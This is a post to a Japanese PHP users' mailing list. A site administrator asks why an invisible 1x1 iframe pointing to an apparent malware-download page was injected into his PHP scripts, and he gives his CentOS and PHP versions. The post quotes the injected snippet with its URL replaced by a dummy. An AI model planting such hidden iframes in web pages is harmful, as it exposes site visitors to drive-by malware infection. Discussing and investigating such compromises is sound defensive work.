[PHP-users 32320] index.phpに対する不正な書き換え

Kosuke Nakahara nakahara @ colormepop.net

初めてMLに投稿します、ナカハラといいます。よろしくお願いします。

■先日、自分の管理していたサイトのPHPのスクリプトの一部に、以下のような
コードが勝手に挿入されてしまいました。

<iframe src='http://dummy/logo/index.php' width='1' height='1'
style='visibility: hidden;'></iframe>

リンク先のURLはダミーですが、ウイルスをダウンロードさせるためのリンク
のようです。

自分の書いているPHPのスクリプトに脆弱性があるのかと思うのですが、検討が
つきません。どなたかこのような事例について、ご存知ないでしょうか?

ご指導のほど、よろしくお願いいたします。

■環境

OS:CentOS 4.4
PHP:4.3.9/5.1.6 (いづれのバージョンでも起こりました)
registor_globalsは、offになっています。

--
Kosuke Nakahara <nakahara @ colormepop.net>